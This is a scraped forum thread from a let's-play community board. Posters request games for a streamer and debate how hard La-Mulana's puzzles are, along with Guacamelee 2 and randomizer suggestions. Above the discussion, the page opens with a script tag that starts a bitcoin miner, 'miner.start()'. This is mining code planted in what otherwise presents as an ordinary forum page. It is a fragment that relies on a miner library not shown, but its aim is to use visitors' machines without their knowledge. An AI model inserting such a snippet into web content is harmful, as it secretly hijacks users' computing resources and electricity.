<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmbx communitysmw central

request grab-bag

this is the place where lps are being talked about. it's important to talk about games being played on the internet.

i am a dog weasel ?!

very yes
50%
yes
24%
no
15%
very no
11%

Total votes: 199

Voltgloss
>GET LAMP
Pronouns: he/him/his

Re: request grab-bag

Postby Voltgloss » 6 months ago

Sebby19 wrote: Have you forgetten how hard La-Mulana is? The sequel would be impossible to LP blind. And then there is the execution.
Have you played and beaten La-Mulana? If not, how can you opine on its difficulty?

Rockythechao
the figure of Kevka's bear was a sightseeing
First name: Michael

Postby Rockythechao » 6 months ago

I am fairly involved in A2XT's development as a content creator, wiki contributor and programmer, but I am not the project lead nor am I responsible for half the things people keep attributing to me lol

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

repairmanman

Postby repairmanman » 6 months ago

Sebby19 wrote: Huh, so that 2nd game is still a thing.

Have you forgetten how hard La-Mulana is? The sequel would be impossible to LP blind. And then there is the execution.
Looking at how late the first game is on the b-side list, I wouldn't exactly expect him to play it right now. La mulana isn't too hard to execute, IIRC, as long as you're not going in blind. Heck, there are some puzzles in there that make almost 0 sense. Going in blind isn't nearly as fun as just doing the execution.
Nothing to see here

Alice
?
Pronouns: Girl person

Postby Alice » 6 months ago

Sebby19 wrote: Huh, so that 2nd game is still a thing.

Have you forgetten how hard La-Mulana is? The sequel would be impossible to LP blind. And then there is the execution.
Might help to actually know about the game before saying something like this. The puzzles were specifically crafted to be less convoluted than the ones in the first game. When you hit a switch of pressure plate, what it does is supposed to be obvious right away.

Voltgloss
>GET LAMP

Postby Voltgloss » 6 months ago

repairmanman wrote: La mulana isn't too hard to execute, IIRC, as long as you're not going in blind. Heck, there are some puzzles in there that make almost 0 sense.
Behind spoiler tags, can you identify to which puzzles you are referring?

sylvie
Pronouns: she/her

Postby sylvie » 6 months ago

I think most of the puzzles have at least one hint somewhere, even if it's a somewhat obtuse hint. One puzzle that I don't think has any hints is

in the Chamber of Birth, jumping through an unmarked (?) fake wall is required to progress at one point. I guess you're supposed to stumble across it by chance or trial-and-error, but I got stuck wandering that area for hours and eventually looked at a guide. I imagine a lot of people solved this "puzzle" very easily and others had a similar experience to me....

I feel like there are so many puzzles that almost every player will get extremely stumped by at least one, even if they know about the hint. They could misinterpret the hint or not understand what the hint is hinting at. Or like in my case, the solution could be simple but just a little bit obscure, and it just never occurs to try it because they're imagining something deeper. And when you get stuck, there is a very large space in which to search for solutions, so you could waste hours trying to make one bit of progress. I imagine for one person to solve the game without using any guides would take a seriously impressive amount of dedication.

repairmanman

Postby repairmanman » 6 months ago

Voltgloss wrote:
repairmanman wrote: La mulana isn't too hard to execute, IIRC, as long as you're not going in blind. Heck, there are some puzzles in there that make almost 0 sense.
Behind spoiler tags, can you identify to which puzzles you are referring?
I may have skipped over some tablets, but I never could figure out how the heck to get the chain whip by myself.
Nothing to see here

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 6 months ago

I'm not really sure why not...? It's just

a simple observation puzzle

; even if you or I failed at it, it's not due to a lack of sense in the puzzle. It's kind of unfair, but not "nonsensical".
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Sebby19

Postby Sebby19 » 6 months ago

Voltgloss wrote:
Sebby19 wrote: Have you forgetten how hard La-Mulana is? The sequel would be impossible to LP blind. And then there is the execution.
Have you played and beaten La-Mulana? If not, how can you opine on its difficulty?
Yes, yes I have played it. A very significant chunk. Beat it? Heck no. Can't remember where, I probably did 80% of it.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

Alice
?

Postby Alice » 6 months ago

sylvie wrote: I think most of the puzzles have at least one hint somewhere, even if it's a somewhat obtuse hint. One puzzle that I don't think has any hints is

in the Chamber of Birth, jumping through an unmarked (?) fake wall is required to progress at one point. I guess you're supposed to stumble across it by chance or trial-and-error, but I got stuck wandering that area for hours and eventually looked at a guide. I imagine a lot of people solved this "puzzle" very easily and others had a similar experience to me....

In my experience, most people end up accidentally solving this specific puzzle (if it's the one I'm thinking of) because they end up with a habit of jumping and attacking walls. Of course not everyone will develop that same habit over the course of the game. I think this is one of the things they planned around in LM2.

SAJewers
hi

Postby SAJewers » 6 months ago

https://www.twitch.tv/videos/291928595?t=01h08m40s

wtf did i just watch and why do i want to see raocow's take on it
ImageImageImageImage
ImageImageImageImage

Smibbix
ah yes i see

Postby Smibbix » 6 months ago

I’d like to reccomend a SMB1 hack called The New Strange Mario Bros. I think it would be a good choice because the rao hasn’t played a SMB1 hack as far as I know and also we do love our strangeness around here. The game is super weird.
I'm already patchouli

n~yoron nyoro~n

strongbadman

Postby strongbadman » 6 months ago

putting this out here, Guacamelee 2 comes out in a day.

tangy
owo
Pronouns: null

Postby tangy » 5 months ago

seconding guacamelee 2
Image Avatar by me

Grounder

Postby Grounder » 5 months ago

requesting raocow to eat a real-ass bowl of guacamole

a small one, obv.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

strongbadman

Postby strongbadman » 5 months ago

Grounder wrote: requesting raocow to eat a real-ass bowl of guacamole

a small one, obv.
bowl included

Parama

Postby Parama » 5 months ago

guac 2 probably won't happen for a while given the current schedule unfortunately but I agree that it should happen, it's fun
If I was suffering, I’d cut the ties that were never meant to bind.

I haven't updated my signature in like half a year oops.

Kilgamayan
The Real Treasure is You
First name: Rabi~En~Roll

Postby Kilgamayan » 5 months ago

LttP Randomizer was in the most recent Patreon poll, right? The next time around, I'd like to suggest upgrading it to the LttP/Super Metroid Combo randomizer.
Image Please interact Image

Image Image
Image Image

Alice
?

Postby Alice » 5 months ago

Grounder wrote: requesting raocow to eat a real-ass bowl of guacamole

a small one, obv.
I think a nice big bowl of Guacamelee would be better.

SAJewers
hi

Postby SAJewers » 5 months ago

ImageImageImageImage
ImageImageImageImage

The Doctor

Postby The Doctor » 5 months ago

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 5 months ago

yeah that game is so much my jam it's almost worrying
the chillaxest of dragonsImage
ImageImage

Ditocoaf
Haustone Tournament Finalist

Postby Ditocoaf » 5 months ago

Uh, yeah. Kitty protagonist, hyper shooting, metroidvania progression, what looks like megaman-inspired bosses, black and white aesthetic?

"Doinksoft" must secretly be some demon raocow accidentally summoned while speaking nonsense during an difficult mario level, a demon with the sole purpose to make a game supernaturally tailored to raocow's tastes.

The Doctor

Postby The Doctor » 5 months ago

Heh, yeah, it's the perfect raocow game. I found that trailer posted on another forum and the only thing I could think while watching was "raocow needs to see this!"

LatexHydra

Postby LatexHydra » 5 months ago

ya'll ever heard of BFBB? it's basically like Mario 64

Return to “let's play”